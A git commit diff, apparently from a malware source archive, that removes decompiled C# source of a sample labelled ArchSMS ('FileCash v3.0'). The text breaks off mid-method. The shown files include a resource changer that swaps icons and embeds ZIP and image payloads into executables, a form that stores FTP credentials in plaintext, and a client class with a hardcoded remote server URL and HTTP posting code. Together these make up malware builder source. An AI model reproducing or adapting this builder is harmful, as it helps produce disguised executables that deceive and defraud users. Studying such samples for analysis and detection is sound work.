This commit is contained in:
vxunderground 2022-08-21 06:29:14 -05:00
parent 8c9f96fc5f
commit a30018ac82
555 changed files with 0 additions and 95674 deletions

View File

@ -1,14 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCopyright("Copyright © 2010")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("FileCash_v3.0")]
[assembly: ComVisible(false)]
[assembly: AssemblyTitle("FileCash_v3.0")]
[assembly: Guid("da9ee069-6d35-4aae-8f01-013d66edec7c")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyVersion("1.0.0.0")]

View File

@ -1,105 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: CheckRunedCopy.SingleInstance
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
namespace CheckRunedCopy
{
internal static class SingleInstance
{
private const int WM_COPYDATA = 74;
private static readonly bool isNew;
private static readonly string guid;
private static Mutex _mutex;
static SingleInstance()
{
using (Process currentProcess = Process.GetCurrentProcess())
SingleInstance.guid = string.Format("[{0}]", (object) currentProcess.ProcessName);
if (SingleInstance._mutex != null)
return;
SingleInstance._mutex = new Mutex(true, SingleInstance.guid, out SingleInstance.isNew);
}
public static bool IsFirstRun => SingleInstance.isNew;
[DllImport("user32.dll", SetLastError = true)]
private static extern bool ShowWindow(IntPtr hWnd, SingleInstance.ShowWindowCommand nCmdShow);
[DllImport("user32.dll", EntryPoint = "FindWindow", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr FindWindowByCaption(IntPtr ZeroOnly, string lpWindowName);
[DllImport("user32.dll", SetLastError = true)]
private static extern bool SetForegroundWindow(IntPtr hWnd);
[DllImport("user32.dll", CharSet = CharSet.Auto)]
private static extern int SendMessage(IntPtr hWnd, int Msg, IntPtr wParam, IntPtr lParam);
public static void ShowWindow(string windowName) => SingleInstance.ShowWindow(SingleInstance.FindWindowByCaption(IntPtr.Zero, windowName));
public static void ShowWindow(IntPtr handleWindow)
{
SingleInstance.ShowWindow(handleWindow, SingleInstance.ShowWindowCommand.Restore);
SingleInstance.SetForegroundWindow(handleWindow);
}
public static string MessageToString(Message m) => ((SingleInstance.COPYDATASTRUCT) Marshal.PtrToStructure(m.LParam, typeof (SingleInstance.COPYDATASTRUCT))).lpData;
public static string[] MessageToArray(Message m) => ((SingleInstance.COPYDATASTRUCT) Marshal.PtrToStructure(m.LParam, typeof (SingleInstance.COPYDATASTRUCT))).lpData.Split(new char[1]
{
' '
}, StringSplitOptions.RemoveEmptyEntries);
public static void SendArgs(string windowName, string[] args) => SingleInstance.SendArgs(SingleInstance.FindWindowByCaption(IntPtr.Zero, windowName), args);
public static void SendArgs(IntPtr handle, string[] args)
{
if (handle == IntPtr.Zero || args == null || args.Length <= 0)
return;
string str = "";
for (int index = 0; index < args.Length; ++index)
str = str + " " + args[index];
SingleInstance.COPYDATASTRUCT structure = new SingleInstance.COPYDATASTRUCT()
{
lpData = str,
cbData = str.Length + 1
};
IntPtr num = Marshal.AllocHGlobal(Marshal.SizeOf((object) structure));
Marshal.StructureToPtr((object) structure, num, false);
SingleInstance.SendMessage(handle, 74, IntPtr.Zero, num);
Marshal.FreeHGlobal(num);
}
private struct COPYDATASTRUCT
{
public int dwData;
public int cbData;
[MarshalAs(UnmanagedType.LPStr)]
public string lpData;
}
private enum ShowWindowCommand
{
Hide = 0,
Normal = 1,
ShowMinimized = 2,
Maximize = 3,
ShowMaximized = 3,
ShowNoActivate = 4,
Show = 5,
Minimize = 6,
ShowMinNoActive = 7,
ShowNA = 8,
Restore = 9,
ShowDefault = 10, // 0x0000000A
ForceMinimize = 11, // 0x0000000B
}
}
}

View File

@ -1,66 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{E4EDF3C3-4D2C-48D1-93E8-62492B20A0F9}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>FileCash_v3.0</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Web" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="FileCash_v3\_0\Program.cs" />
<Compile Include="FileCash_v3\_0\auth.cs" />
<Compile Include="FileCash_v3\_0\FTP.cs" />
<Compile Include="FileCash_v3\_0\Form1.cs" />
<Compile Include="FileCash_v3\_0\NotifyWindow.cs" />
<Compile Include="FileCash_v3\_0\FileCash.cs" />
<Compile Include="FileCash_v3\_0\PreparingArchivationParams.cs" />
<Compile Include="FileCash_v3\_0\TimerResoultParam.cs" />
<Compile Include="FileCash_v3\_0\Properties\Resources.cs" />
<Compile Include="FileCash_v3\_0\Properties\Settings.cs" />
<Compile Include="CheckRunedCopy\SingleInstance.cs" />
<Compile Include="ListViewSorter\ListViewColumnSorter.cs" />
<Compile Include="ListViewSorter\ImageTextComparer.cs" />
<Compile Include="ListViewSorter\NumberCaseInsensitiveComparer.cs" />
<Compile Include="ListViewEmbeddedControls\ListViewEx.cs" />
<Compile Include="EnumResNamesCS\ResourceChanger.cs" />
<Compile Include="EnumResNamesCS\ICONDIRENTRY.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="FileCash_v3\_0\auth.resx" />
<EmbeddedResource Include="FileCash_v3\_0\Form1.resx" />
<EmbeddedResource Include="FileCash_v3\_0\FTP.resx" />
<EmbeddedResource Include="FileCash_v3\_0\NotifyWindow.resx" />
<EmbeddedResource Include="FileCash_v3\_0\Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FileCash_v3.0", "Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.csproj", "{E4EDF3C3-4D2C-48D1-93E8-62492B20A0F9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E4EDF3C3-4D2C-48D1-93E8-62492B20A0F9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{E4EDF3C3-4D2C-48D1-93E8-62492B20A0F9}.Debug|Any CPU.Build.0 = Debug|Any CPU
{E4EDF3C3-4D2C-48D1-93E8-62492B20A0F9}.Release|Any CPU.ActiveCfg = Release|Any CPU
{E4EDF3C3-4D2C-48D1-93E8-62492B20A0F9}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -1,23 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: EnumResNamesCS.ICONDIRENTRY
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
namespace EnumResNamesCS
{
internal class ICONDIRENTRY
{
public byte bWidth;
public byte bHeight;
public byte bColorCount;
public byte bReserved;
public short wPlanes;
public short wBitCount;
public int dwBytesInRes;
public int dwImageOffset;
public byte[] image;
public override string ToString() => "ICONDIRENTRY (" + (object) this.bWidth + "x" + (object) this.bHeight + " " + (object) this.wBitCount + " bpp)";
}
}

View File

@ -1,127 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: EnumResNamesCS.ResourceChanger
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace EnumResNamesCS
{
internal class ResourceChanger
{
private const uint RT_CURSOR = 1;
private const uint RT_BITMAP = 2;
private const uint RT_ICON = 3;
private const uint RT_MENU = 4;
private const uint RT_DIALOG = 5;
private const uint RT_STRING = 6;
private const uint RT_FONTDIR = 7;
private const uint RT_FONT = 8;
private const uint RT_ACCELERATOR = 9;
private const uint RT_RCDATA = 16;
private const uint RT_MESSAGETABLE = 17;
private const uint RT_GROUP_ICON = 196608;
private const uint LOAD_LIBRARY_AS_DATAFILE = 2;
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr LoadLibraryEx(string lpFileName, IntPtr hFile, uint dwFlags);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool FreeLibrary(IntPtr hModule);
[DllImport("kernel32.dll", EntryPoint = "EnumResourceNamesW", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern bool EnumResourceNamesWithName(
IntPtr hModule,
string lpszType,
ResourceChanger.EnumResNameDelegate lpEnumFunc,
IntPtr lParam);
[DllImport("kernel32.dll", EntryPoint = "EnumResourceNamesW", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern bool EnumResourceNamesWithID(
IntPtr hModule,
uint lpszType,
ResourceChanger.EnumResNameDelegate lpEnumFunc,
IntPtr lParam);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr BeginUpdateResource(
string pFileName,
[MarshalAs(UnmanagedType.Bool)] bool bDeleteExistingResources);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool UpdateResource(
IntPtr hUpdate,
uint lpType,
uint lpName,
ushort wLanguage,
byte[] lpData,
uint cbData);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool EndUpdateResource(IntPtr hUpdate, bool fDiscard);
private static bool IS_INTRESOURCE(IntPtr value) => (uint) (int) value <= (uint) ushort.MaxValue;
private static uint GET_RESOURCE_ID(IntPtr value) => ResourceChanger.IS_INTRESOURCE(value) ? (uint) (int) value : throw new NotSupportedException("value is not an ID!");
private static string GET_RESOURCE_NAME(IntPtr value) => ResourceChanger.IS_INTRESOURCE(value) ? value.ToString() : Marshal.PtrToStringUni(value);
public void ClearIcons(string exe)
{
IntPtr hModule = ResourceChanger.LoadLibraryEx(exe, IntPtr.Zero, 2U);
if (!ResourceChanger.EnumResourceNamesWithID(hModule, 3U, new ResourceChanger.EnumResNameDelegate(this.EnumRes), IntPtr.Zero))
{
int num = (int) MessageBox.Show("gle: " + Marshal.GetLastWin32Error().ToString());
}
ResourceChanger.FreeLibrary(hModule);
}
public bool EnumRes(IntPtr hModule, IntPtr lpszType, IntPtr lpszName, IntPtr lParam) => true;
public void ChangeIcon(string exe, string ico)
{
IntPtr hUpdate = ResourceChanger.BeginUpdateResource(exe, false);
using (BinaryReader binaryReader = new BinaryReader((Stream) new FileStream(ico, FileMode.Open)))
{
int num1 = (int) binaryReader.ReadInt16();
int num2 = (int) binaryReader.ReadInt16();
if (num1 != 0 || num2 != 1)
throw new Exception("Invalid .ico file format");
long num3 = (long) binaryReader.ReadInt16();
ResourceChanger.UpdateResource(hUpdate, 3U, Convert.ToUInt32(1), (ushort) 0, (byte[]) null, 0U);
ResourceChanger.UpdateResource(hUpdate, 3U, Convert.ToUInt32(2), (ushort) 0, (byte[]) null, 0U);
ResourceChanger.UpdateResource(hUpdate, 3U, Convert.ToUInt32(3), (ushort) 0, (byte[]) null, 0U);
ResourceChanger.UpdateResource(hUpdate, 3U, Convert.ToUInt32(4), (ushort) 0, (byte[]) null, 0U);
ResourceChanger.UpdateResource(hUpdate, 14U, Convert.ToUInt32(128), (ushort) 0, (byte[]) null, 0U);
ResourceChanger.EndUpdateResource(hUpdate, false);
}
ResourceChanger.EndUpdateResource(hUpdate, false);
}
public void AddImg(string exe, string img, uint id = 88)
{
IntPtr hUpdate = ResourceChanger.BeginUpdateResource(exe, false);
byte[] lpData = File.ReadAllBytes(img);
ResourceChanger.UpdateResource(hUpdate, 10U, id, (ushort) 0, lpData, (uint) lpData.Length);
ResourceChanger.EndUpdateResource(hUpdate, false);
}
public void AddZIP(string exe, string zip, uint id = 89)
{
IntPtr hUpdate = ResourceChanger.BeginUpdateResource(exe, false);
byte[] lpData = File.ReadAllBytes(zip);
ResourceChanger.UpdateResource(hUpdate, 10U, id, (ushort) 0, lpData, (uint) lpData.Length);
ResourceChanger.EndUpdateResource(hUpdate, false);
}
private delegate bool EnumResNameDelegate(
IntPtr hModule,
IntPtr lpszType,
IntPtr lpszName,
IntPtr lParam);
}
}

View File

@ -1,229 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: FileCash_v3._0.FTP
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System;
using System.ComponentModel;
using System.Drawing;
using System.IO;
using System.Text;
using System.Windows.Forms;
using System.Xml;
namespace FileCash_v3._0
{
public class FTP : Form
{
private FileCash FCashObj;
private IContainer components;
private GroupBox groupBox1;
private Button FTP_Add;
private TextBox FtpPath;
private Label label6;
private TextBox FtpPort;
private Label label5;
private TextBox FtpServer;
private TextBox FtpPass;
private TextBox FtpLogin;
private TextBox FtpName;
private Label label4;
private Label label3;
private Label label2;
private Label label1;
public FTP(ref FileCash FC)
{
this.FCashObj = FC;
this.InitializeComponent();
}
private void FTP_Add_Click(object sender, EventArgs e)
{
if (this.FtpName.Text.Trim() == "")
{
int num1 = (int) MessageBox.Show("Нужно ввести название FTP!", "Ошибка добавления FTP", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.FtpServer.Text.Trim() == "")
{
int num2 = (int) MessageBox.Show("Нужно ввести имя сервера FTP!", "Ошибка добавления FTP", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.FtpPort.Text.Trim() == "")
{
int num3 = (int) MessageBox.Show("Нужно ввести номер порта!", "Ошибка добавления FTP", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.FtpLogin.Text.Trim() == "")
{
int num4 = (int) MessageBox.Show("Нужно ввести логин!", "Ошибка добавления FTP", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.FtpPass.Text.Trim() == "")
{
int num5 = (int) MessageBox.Show("Нужно ввести пароль!", "Ошибка добавления FTP", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else
{
if (!Directory.Exists(this.FCashObj.LocalTmpPath))
Directory.CreateDirectory(this.FCashObj.LocalTmpPath);
if (!File.Exists(this.FCashObj.FTP_XML_Path))
{
FileStream fileStream = File.Open(this.FCashObj.FTP_XML_Path, FileMode.OpenOrCreate, FileAccess.ReadWrite);
StreamWriter streamWriter = new StreamWriter((Stream) fileStream, Encoding.UTF8);
streamWriter.WriteLine("<ftp>");
streamWriter.Flush();
streamWriter.WriteLine("</ftp>");
streamWriter.Flush();
streamWriter.Close();
fileStream.Dispose();
fileStream.Close();
}
string str = "<acc>" + "<name>" + this.FtpName.Text.Trim() + "</name>" + "<server>" + this.FtpServer.Text.Trim() + "</server>" + "<port>" + this.FtpPort.Text.Trim() + "</port>" + "<login>" + this.FtpLogin.Text.Trim() + "</login>" + "<pass>" + this.FtpPass.Text.Trim() + "</pass>" + "<path>" + this.FtpPath.Text.Trim() + "</path>" + "</acc>";
XmlDocument xmlDocument1;
XmlDocument xmlDocument2 = xmlDocument1 = new XmlDocument();
xmlDocument2.Load(this.FCashObj.FTP_XML_Path);
XmlDocumentFragment documentFragment = xmlDocument2.CreateDocumentFragment();
documentFragment.InnerXml = str;
xmlDocument2.DocumentElement.AppendChild((XmlNode) documentFragment);
FileStream outStream = new FileStream(this.FCashObj.FTP_XML_Path, FileMode.Truncate, FileAccess.Write, FileShare.ReadWrite);
xmlDocument2.Save((Stream) outStream);
outStream.Close();
this.Close();
}
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.groupBox1 = new GroupBox();
this.label1 = new Label();
this.label2 = new Label();
this.label3 = new Label();
this.label4 = new Label();
this.FtpName = new TextBox();
this.FtpLogin = new TextBox();
this.FtpPass = new TextBox();
this.FtpServer = new TextBox();
this.label5 = new Label();
this.FtpPort = new TextBox();
this.FtpPath = new TextBox();
this.label6 = new Label();
this.FTP_Add = new Button();
this.groupBox1.SuspendLayout();
this.SuspendLayout();
this.groupBox1.Controls.Add((Control) this.FTP_Add);
this.groupBox1.Controls.Add((Control) this.FtpPath);
this.groupBox1.Controls.Add((Control) this.label6);
this.groupBox1.Controls.Add((Control) this.FtpPort);
this.groupBox1.Controls.Add((Control) this.label5);
this.groupBox1.Controls.Add((Control) this.FtpServer);
this.groupBox1.Controls.Add((Control) this.FtpPass);
this.groupBox1.Controls.Add((Control) this.FtpLogin);
this.groupBox1.Controls.Add((Control) this.FtpName);
this.groupBox1.Controls.Add((Control) this.label4);
this.groupBox1.Controls.Add((Control) this.label3);
this.groupBox1.Controls.Add((Control) this.label2);
this.groupBox1.Controls.Add((Control) this.label1);
this.groupBox1.Location = new Point(4, 6);
this.groupBox1.Name = "groupBox1";
this.groupBox1.Size = new Size(276, 234);
this.groupBox1.TabIndex = 0;
this.groupBox1.TabStop = false;
this.groupBox1.Text = "Добавить FTP";
this.label1.AutoSize = true;
this.label1.Font = new Font("Microsoft Sans Serif", 9f, FontStyle.Regular, GraphicsUnit.Point, (byte) 204);
this.label1.Location = new Point(18, 27);
this.label1.Name = "label1";
this.label1.Size = new Size(67, 15);
this.label1.TabIndex = 0;
this.label1.Text = "Название:";
this.label2.AutoSize = true;
this.label2.Font = new Font("Microsoft Sans Serif", 9f, FontStyle.Regular, GraphicsUnit.Point, (byte) 204);
this.label2.Location = new Point(18, 61);
this.label2.Name = "label2";
this.label2.Size = new Size(53, 15);
this.label2.TabIndex = 1;
this.label2.Text = "Сервер:";
this.label3.AutoSize = true;
this.label3.Font = new Font("Microsoft Sans Serif", 9f, FontStyle.Regular, GraphicsUnit.Point, (byte) 204);
this.label3.Location = new Point(18, 93);
this.label3.Name = "label3";
this.label3.Size = new Size(44, 15);
this.label3.TabIndex = 2;
this.label3.Text = "Логин:";
this.label4.AutoSize = true;
this.label4.Font = new Font("Microsoft Sans Serif", 9f, FontStyle.Regular, GraphicsUnit.Point, (byte) 204);
this.label4.Location = new Point(18, (int) sbyte.MaxValue);
this.label4.Name = "label4";
this.label4.Size = new Size(54, 15);
this.label4.TabIndex = 3;
this.label4.Text = "Пароль:";
this.FtpName.Location = new Point(91, 27);
this.FtpName.Name = "FtpName";
this.FtpName.Size = new Size(177, 20);
this.FtpName.TabIndex = 4;
this.FtpLogin.Location = new Point(91, 92);
this.FtpLogin.Name = "FtpLogin";
this.FtpLogin.Size = new Size(177, 20);
this.FtpLogin.TabIndex = 5;
this.FtpPass.Location = new Point(91, 126);
this.FtpPass.Name = "FtpPass";
this.FtpPass.Size = new Size(177, 20);
this.FtpPass.TabIndex = 6;
this.FtpServer.Location = new Point(91, 60);
this.FtpServer.Name = "FtpServer";
this.FtpServer.Size = new Size(105, 20);
this.FtpServer.TabIndex = 7;
this.label5.AutoSize = true;
this.label5.Font = new Font("Microsoft Sans Serif", 9f, FontStyle.Bold, GraphicsUnit.Point, (byte) 204);
this.label5.Location = new Point(202, 61);
this.label5.Name = "label5";
this.label5.Size = new Size(11, 15);
this.label5.TabIndex = 8;
this.label5.Text = ":";
this.FtpPort.Location = new Point(219, 60);
this.FtpPort.Name = "FtpPort";
this.FtpPort.Size = new Size(49, 20);
this.FtpPort.TabIndex = 9;
this.FtpPort.Text = "21";
this.FtpPath.Location = new Point(91, 161);
this.FtpPath.Name = "FtpPath";
this.FtpPath.Size = new Size(177, 20);
this.FtpPath.TabIndex = 11;
this.label6.AutoSize = true;
this.label6.Font = new Font("Microsoft Sans Serif", 9f, FontStyle.Regular, GraphicsUnit.Point, (byte) 204);
this.label6.Location = new Point(18, 161);
this.label6.Name = "label6";
this.label6.Size = new Size(35, 15);
this.label6.TabIndex = 10;
this.label6.Text = "Путь";
this.FTP_Add.Location = new Point(21, 199);
this.FTP_Add.Name = "FTP_Add";
this.FTP_Add.Size = new Size(247, 23);
this.FTP_Add.TabIndex = 12;
this.FTP_Add.Text = "Добавить";
this.FTP_Add.UseVisualStyleBackColor = true;
this.FTP_Add.Click += new EventHandler(this.FTP_Add_Click);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(284, 245);
this.Controls.Add((Control) this.groupBox1);
this.FormBorderStyle = FormBorderStyle.FixedSingle;
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (FTP);
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.StartPosition = FormStartPosition.CenterParent;
this.Text = "Добавить FTP";
this.groupBox1.ResumeLayout(false);
this.groupBox1.PerformLayout();
this.ResumeLayout(false);
}
}
}

View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

View File

@ -1,128 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: FileCash_v3._0.FileCash
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace FileCash_v3._0
{
public class FileCash
{
public string DomainIP = "http://ccdev1.ru/_arch_api";
public string SavedPassFolder = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\FileCash";
public string SavedPassXml;
public string LocalTmpPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\FileCash";
public string FTP_XML_Path;
public string SavedProfilePath;
public string SavedProjectPath;
public string HDD_Serial;
public string SID;
public string Login;
public string Password;
public string OS_Version;
public int USERID;
public string LastAuth;
public string Boundary = "--JHG87t709*&tert5546jh^hg6je1ghj98rhjt646err54*er%^465SDFF45S46";
public FileCash()
{
this.SavedPassXml = this.SavedPassFolder + "\\svauth.lpiud";
this.FTP_XML_Path = this.LocalTmpPath + "\\ftp.fcf";
this.SavedProfilePath = this.LocalTmpPath + "\\profile.fcprfl";
this.SavedProjectPath = this.LocalTmpPath + "\\project.fcproj";
}
public void GetSID(string Url)
{
try
{
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(Url);
httpWebRequest.Method = "GET";
WebResponse response = httpWebRequest.GetResponse();
StreamReader streamReader = new StreamReader(response.GetResponseStream(), Encoding.UTF8);
this.SID = streamReader.ReadToEnd();
streamReader.Close();
response.Close();
}
catch
{
int num = (int) MessageBox.Show("Не возможно подлючится к серверу!", "Ошибка авторизации", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
}
public string SendPost(string Url, string PostData)
{
try
{
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(Url);
httpWebRequest.Method = "POST";
httpWebRequest.ContentType = "application/x-www-form-urlencoded";
byte[] bytes = Encoding.UTF8.GetBytes(PostData);
httpWebRequest.ContentLength = (long) bytes.Length;
